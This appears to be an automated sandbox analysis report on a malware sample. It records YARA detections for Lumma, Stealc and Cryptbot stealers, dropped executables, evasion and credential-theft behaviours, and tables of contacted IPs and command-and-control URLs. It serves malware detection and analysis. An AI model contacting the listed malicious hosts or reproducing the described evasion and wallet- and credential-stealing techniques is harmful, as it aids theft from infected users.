Source: Yara match File source: 00000006.00000003.2526994881.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2579847684.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2551466487.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2503489099.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2721968378.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2722546873.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Lumma55.exe PID: 7372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e3ce0163b.exe PID: 600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e3ce0163b.exe PID: 8052, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: 0000000B.00000003.2753075024.000000000188F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2965543678.0000000001888000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 67baab2438.exe PID: 8160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 67baab2438.exe PID: 2812, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: Lumma55.exe PID: 7372, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e3ce0163b.exe PID: 600, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8e3ce0163b.exe PID: 8052, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000019.00000002.2836132086.0000000000EB1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2835040452.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2746461247.0000000005080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2662804709.0000000000EB1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2617805779.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2661265680.00000000007AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 80c14d0add.exe PID: 3548, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 80c14d0add.exe PID: 2324, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561240 Sample: file.exe Startdate: 22/11/2024 Architecture: WINDOWS Score: 100 72 tail-cease.cyou 2->72 74 youtube.com 2->74 76 39 other IPs or domains 2->76 96 Suricata IDS alerts for network traffic 2->96 98 Found malware configuration 2->98 100 Antivirus detection for URL or domain 2->100 102 16 other signatures 2->102 9 skotes.exe 4 32 2->9         started        14 file.exe 5 2->14         started        16 8e3ce0163b.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 90 185.215.113.43, 49753, 49759, 49781 WHOLESALECONNECTIONSNL Portugal 9->90 92 185.215.113.16, 49788, 49815, 49843 WHOLESALECONNECTIONSNL Portugal 9->92 94 31.41.244.11, 49765, 49911, 80 AEROEXPRESS-ASRU Russian Federation 9->94 60 C:\Users\user\AppData\...\d199ee6df3.exe, PE32 9->60 dropped 62 C:\Users\user\AppData\...\3f81b82714.exe, PE32 9->62 dropped 64 C:\Users\user\AppData\...\67baab2438.exe, PE32 9->64 dropped 70 9 other malicious files 9->70 dropped 130 Creates multiple autostart registry keys 9->130 132 Hides threads from debuggers 9->132 134 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->134 20 Lumma55.exe 9->20         started        24 8e3ce0163b.exe 9->24         started        26 3f81b82714.exe 9->26         started        34 3 other processes 9->34 66 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->66 dropped 68 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->68 dropped 136 Detected unpacking (changes PE section rights) 14->136 138 Tries to evade debugger and weak emulator (self modifying code) 14->138 140 Tries to detect virtualization through RDTSC time measurements 14->140 28 skotes.exe 14->28         started        142 Query firmware table information (likely to detect VMs) 16->142 144 Found many strings related to Crypto-Wallets (likely being stolen) 16->144 146 Tries to harvest and steal ftp login credentials 16->146 152 2 other signatures 16->152 148 Binary is likely a compiled AutoIt script file 18->148 150 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->150 30 firefox.exe 18->30         started        32 taskkill.exe 18->32         started        file6 signatures7 process8 dnsIp9 78 tail-cease.cyou 104.21.93.105, 443, 49784, 49790 CLOUDFLARENETUS United States 20->78 104 Antivirus detection for dropped file 20->104 106 Multi AV Scanner detection for dropped file 20->106 108 Detected unpacking (changes PE section rights) 20->108 124 2 other signatures 20->124 80 property-imper.sbs 104.21.33.116, 443, 49808, 49816 CLOUDFLARENETUS United States 24->80 110 Query firmware table information (likely to detect VMs) 24->110 112 Tries to detect sandboxes and other dynamic analysis tools (window names) 24->112 114 Machine Learning detection for dropped file 24->114 116 Modifies windows update settings 26->116 118 Disables Windows Defender Tamper protection 26->118 126 3 other signatures 26->126 128 3 other signatures 28->128 82 youtube.com 142.250.181.142, 443, 49902, 49903 GOOGLEUS United States 30->82 84 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49904, 80 GOOGLEUS United States 30->84 88 3 other IPs or domains 30->88 36 firefox.exe 30->36         started        38 firefox.exe 30->38         started        40 conhost.exe 32->40         started        86 185.215.113.206, 49835, 49889, 80 WHOLESALECONNECTIONSNL Portugal 34->86 120 Binary is likely a compiled AutoIt script file 34->120 122 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 34->122 42 taskkill.exe 34->42         started        44 taskkill.exe 34->44         started        46 taskkill.exe 34->46         started        48 3 other processes 34->48 signatures10 process11 process12 50 conhost.exe 42->50         started        52 conhost.exe 44->52         started        54 conhost.exe 46->54         started        56 conhost.exe 48->56         started        58 conhost.exe 48->58         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
104.21.93.105
 tail-cease.cyou United States
13335 CLOUDFLARENETUS true
34.117.188.166
 contile.services.mozilla.com United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
104.21.33.116
 property-imper.sbs United States
13335 CLOUDFLARENETUS false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.181.142
 youtube.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
31.41.244.11
 unknown Russian Federation
61974 AEROEXPRESS-ASRU false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
star-mini.c10r.facebook.com 157.240.196.35 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
twitter.com 104.244.42.1 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
home.fvtekk5pn.top 34.116.198.130 true
property-imper.sbs 104.21.33.116 true
s-part-0035.t-0009.t-msedge.net 13.107.246.63 true
dyna.wikimedia.org 185.15.58.224 true
prod.remote-settings.prod.webservices.mozgcp.net 34.149.100.209 true
contile.services.mozilla.com 34.117.188.166 true
fvtekk5pn.top 34.116.198.130 true
youtube.com 142.250.181.142 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
youtube-ui.l.google.com 142.250.181.110 true
reddit.map.fastly.net 151.101.1.140 true
us-west1.prod.sumo.prod.webservices.mozgcp.net 34.149.128.2 true
ipv4only.arpa 192.0.0.171 true
tail-cease.cyou 104.21.93.105 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
push.services.mozilla.com 34.107.243.93 true
www.google.com 142.250.181.68 true
telemetry-incoming.r53-2.services.mozilla.com 34.120.208.123 true
js.monitor.azure.com unknown unknown
www.reddit.com unknown unknown
spocs.getpocket.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
support.mozilla.org unknown unknown
firefox.settings.services.mozilla.com unknown unknown
www.youtube.com unknown unknown
www.facebook.com unknown unknown
detectportal.firefox.com unknown unknown
shavar.services.mozilla.com unknown unknown
www.wikipedia.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    https://property-imper.sbs/api true
    • Avira URL Cloud: safe
    		 unknown
    https://tail-cease.cyou/api true
    • Avira URL Cloud: safe
    		 unknown